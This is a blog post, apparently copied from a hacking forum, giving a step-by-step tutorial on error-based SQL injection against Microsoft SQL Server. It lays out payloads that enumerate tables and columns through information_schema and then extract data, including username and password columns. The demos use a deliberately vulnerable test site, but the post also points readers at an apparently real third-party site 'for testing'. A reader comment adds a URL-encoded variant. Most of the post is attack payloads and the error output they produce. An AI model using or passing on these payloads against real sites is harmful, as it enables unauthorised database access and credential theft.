Multiple Tables/Columns at once-Microsoft_db

Monday, November 5, 2012

Hi everyone,Today I'll show you How to extract data in a way easy from Microsoft_db

First the site 

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1 

table name

PHP Code:
+AND = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) 

:: demo ::

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table%E2%80%8B_name FROM information_schema.tables)) 

Conversion failed when converting the nvarchar value 'users' to data type int. 

and we can used TOP 1 to Extracting more tables if That does not appear to us a table user

| ^_^ | used like TOP 2

Choose the second TOP 1 and not the first

limit dosent exist,so we are using TOP X instead

Now extract the columns

PHP Code:
+AND = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) 

:: demo ::

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND 1 = (SELECT TOP 1 column_name FROM infrmation_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) 

Conversion failed when converting the nvarchar value 'forumid' to data type int. 

Extract the rest of the columns we use TOP 1 like TOP 2

TOP 6

Conversion failed when converting the nvarchar value 'uname' to data type int.

TOP 7

Conversion failed when converting the nvarchar value 'upass' to data type int. 

Extracting data

PHP Code:
+or 1=convert(int,(select+top+1+COLUMN+from+TABLE)) 

+and 1=cast((Select TOP 1 COLUMN from TABLE) as int

I explained the other way here

PHP Code:
http://www.hackforums.net/showthread.php?tid=2533582 

:: Site for testing ::

PHP Code:
http://www.cumtux.org/default.asp?pageid=35&deptid=1 

Thank's for reading Black Hat


Great tut but I have to comment on something
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) 
This isn't necessary and might not always work
Because users table isn't always the second table
instead use this

PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+AND%201%20=%20%28SELECT%20TOP%201%20table_name%20FROM%20info​rmation_schema.tables%20where%20table_name!=%27threads%27%29 
Great anyways

Posted by Unknown at 6:36 PM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)